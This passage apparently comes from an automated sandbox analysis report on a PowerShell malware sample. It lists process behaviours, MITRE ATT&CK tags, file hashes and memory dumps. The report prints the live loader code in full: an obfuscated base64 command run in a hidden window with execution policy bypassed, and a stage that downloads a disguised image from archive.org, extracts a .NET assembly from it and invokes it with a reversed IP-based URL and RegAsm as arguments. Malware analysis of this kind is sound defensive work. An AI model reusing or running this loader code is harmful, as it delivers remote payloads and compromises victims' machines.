㏸ ௵Zw⨄ ㍴ ⨽ ㏸ ௵o⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵YgBh⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵ZQ⨄ ㍴ ⨽ ㏸ ௵2⨄ ㍴ ⨽ ㏸ ௵DQ⨄ ㍴ ⨽ ㏸ ௵QwBv⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵bQBh⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵p⨄ ㍴ ⨽ ㏸ ௵Ds⨄ ㍴ ⨽ ㏸ ௵J⨄ ㍴ ⨽ ㏸ ௵Bs⨄ ㍴ ⨽ ㏸ ௵G8⨄ ㍴ ⨽ ㏸ ௵YQBk⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵BB⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵cwBl⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵YgBs⨄ ㍴ ⨽ ㏸ ௵Hk⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵9⨄ ㍴ ⨽ ㏸ ௵C⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵WwBT⨄ ㍴ ⨽ ㏸ ௵Hk⨄ ㍴ ⨽ ㏸ ௵cwB0⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵bQ⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵FI⨄ ㍴ ⨽ ㏸ ௵ZQBm⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵ZQBj⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵aQBv⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵LgBB⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵cwBl⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵YgBs⨄ ㍴ ⨽ ㏸ ௵Hk⨄ ㍴ ⨽ ㏸ ௵XQ⨄ ㍴ ⨽ ㏸ ௵6⨄ ㍴ ⨽ ㏸ ௵Do⨄ ㍴ ⨽ ㏸ ௵T⨄ ㍴ ⨽ ㏸ ௵Bv⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵o⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵YwBv⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵bQBh⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵BC⨄ ㍴ ⨽ ㏸ ௵Hk⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bl⨄ ㍴ ⨽ ㏸ ௵HM⨄ ㍴ ⨽ ㏸ ௵KQ⨄ ㍴ ⨽ ㏸ ௵7⨄ ㍴ ⨽ ㏸ ௵CQ⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵B5⨄ ㍴ ⨽ ㏸ ௵H⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵ZQ⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵D0⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵bwBh⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵ZQBk⨄ ㍴ ⨽ ㏸ ௵EE⨄ ㍴ ⨽ ㏸ ௵cwBz⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵bQBi⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵eQ⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵Ec⨄ ㍴ ⨽ ㏸ ௵ZQB0⨄ ㍴ ⨽ ㏸ ௵FQ⨄ ㍴ ⨽ ㏸ ௵eQBw⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵K⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵n⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵bgBs⨄ ㍴ ⨽ ㏸ ௵Gk⨄ ㍴ ⨽ ㏸ ௵Yg⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵Ek⨄ ㍴ ⨽ ㏸ ௵Tw⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵Eg⨄ ㍴ ⨽ ㏸ ௵bwBt⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵Jw⨄ ㍴ ⨽ ㏸ ௵p⨄ ㍴ ⨽ ㏸ ௵Ds⨄ ㍴ ⨽ ㏸ ௵J⨄ ㍴ ⨽ ㏸ ௵Bt⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bo⨄ ㍴ ⨽ ㏸ ௵G8⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵D0⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵eQBw⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵LgBH⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵BN⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bo⨄ ㍴ ⨽ ㏸ ௵G8⨄ ㍴ ⨽ ㏸ ௵Z⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵o⨄ ㍴ ⨽ ㏸ ௵Cc⨄ ㍴ ⨽ ㏸ ௵VgBB⨄ ㍴ ⨽ ㏸ ௵Ek⨄ ㍴ ⨽ ㏸ ௵Jw⨄ ㍴ ⨽ ㏸ ௵p⨄ ㍴ ⨽ ㏸ ௵C4⨄ ㍴ ⨽ ㏸ ௵SQBu⨄ ㍴ ⨽ ㏸ ௵HY⨄ ㍴ ⨽ ㏸ ௵bwBr⨄ ㍴ ⨽ ㏸ ௵GU⨄ ㍴ ⨽ ㏸ ௵K⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵k⨄ ㍴ ⨽ ㏸ ௵G4⨄ ㍴ ⨽ ㏸ ௵dQBs⨄ ㍴ ⨽ ㏸ ௵Gw⨄ ㍴ ⨽ ㏸ ௵L⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵Fs⨄ ㍴ ⨽ ㏸ ௵bwBi⨄ ㍴ ⨽ ㏸ ௵Go⨄ ㍴ ⨽ ㏸ ௵ZQBj⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵WwBd⨄ ㍴ ⨽ ㏸ ௵F0⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵o⨄ ㍴ ⨽ ㏸ ௵Cc⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵B4⨄ ㍴ ⨽ ㏸ ௵HQ⨄ ㍴ ⨽ ㏸ ௵LgBF⨄ ㍴ ⨽ ㏸ ௵FM⨄ ㍴ ⨽ ㏸ ௵UwBB⨄ ㍴ ⨽ ㏸ ௵Eg⨄ ㍴ ⨽ ㏸ ௵Qw⨄ ㍴ ⨽ ㏸ ௵v⨄ ㍴ ⨽ ㏸ ௵D⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵OQ⨄ ㍴ ⨽ ㏸ ௵v⨄ ㍴ ⨽ ㏸ ௵DM⨄ ㍴ ⨽ ㏸ ௵OQ⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵DQ⨄ ㍴ ⨽ ㏸ ௵Ng⨄ ㍴ ⨽ ㏸ ௵u⨄ ㍴ ⨽ ㏸ ௵Dc⨄ ㍴ ⨽ ㏸ ௵OQ⨄ ㍴ ⨽ ㏸ ௵x⨄ ㍴ ⨽ ㏸ ௵C4⨄ ㍴ ⨽ ㏸ ௵Mg⨄ ㍴ ⨽ ㏸ ௵4⨄ ㍴ ⨽ ㏸ ௵C8⨄ ㍴ ⨽ ㏸ ௵Lw⨄ ㍴ ⨽ ㏸ ௵6⨄ ㍴ ⨽ ㏸ ௵H⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵B0⨄ ㍴ ⨽ ㏸ ௵Gg⨄ ㍴ ⨽ ㏸ ௵Jw⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵Cw⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵n⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵ZQBz⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bp⨄ ㍴ ⨽ ㏸ ௵HY⨄ ㍴ ⨽ ㏸ ௵YQBk⨄ ㍴ ⨽ ㏸ ௵G8⨄ ㍴ ⨽ ㏸ ௵Jw⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵Cw⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵n⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵ZQBz⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bp⨄ ㍴ ⨽ ㏸ ௵HY⨄ ㍴ ⨽ ㏸ ௵YQBk⨄ ㍴ ⨽ ㏸ ௵G8⨄ ㍴ ⨽ ㏸ ௵Jw⨄ ㍴ ⨽ ㏸ ௵g⨄ ㍴ ⨽ ㏸ ௵Cw⨄ ㍴ ⨽ ㏸ ௵I⨄ ㍴ ⨽ ㏸ ௵⨄ ㍴ ⨽ ㏸ ௵n⨄ ㍴ ⨽ ㏸ ௵GQ⨄ ㍴ ⨽ ㏸ ௵ZQBz⨄ ㍴ ⨽ ㏸ ௵GE⨄ ㍴ ⨽ ㏸ ௵d⨄ ㍴ ⨽ ㏸ ௵Bp⨄ ㍴ ⨽ ㏸ ௵HY⨄ ㍴ ⨽ ㏸ ௵YQBk⨄ ㍴ ⨽ ㏸ ௵G8⨄ ㍴ ⨽ ㏸ ௵Jw⨄ ㍴ ⨽ ㏸ ௵s⨄ ㍴ ⨽ ㏸ ௵Cc⨄ ㍴ ⨽ ㏸ ௵UgBl⨄ ㍴ ⨽ ㏸ ௵Gc⨄ ㍴ ⨽ ㏸ ௵QQBz⨄ ㍴ ⨽ ㏸ ௵G0⨄ ㍴ ⨽ ㏸ ௵Jw⨄ ㍴ ⨽ ㏸ ௵s⨄ ㍴ ⨽ ㏸ ௵Cc⨄ ㍴ ⨽ ㏸ ௵Jw⨄ ㍴ ⨽ ㏸ ௵p⨄ ㍴ ⨽ ㏸ ௵Ck⨄ ㍴ ⨽ ㏸ ௵';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⨄ ㍴ ⨽ ㏸ ௵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.ESSAHC/09/39.46.791.28//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7609c83e81358134522af4a46e684cd0

SHA1
27a8d0960417c69b8cb8a22a211dbcd3ad8be2bd

SHA256
31496bf2dffa88c27cd310e61d2af37998af53724e0c577ea481ca1cf63b6c32

SHA512
f572abd4b0ad041e94137f9707dd2b4c1a9f030eeaf3a84fb21ece9ae89d750c3b63b0640e03359e7809a02d9cfb9c9f0eb4e0a15082e1c442951cc0199aadfe

Download Submit
memory/2596-4-0x000007FEF5EBE000-0x000007FEF5EBF000-memory.dmp

Filesize
4KB

Download
memory/2596-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2596-6-0x0000000002690000-0x0000000002698000-memory.dmp

Filesize
32KB

Download
memory/2596-7-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-8-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-9-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-10-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

Filesize
9.6MB

Download
memory/2596-16-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing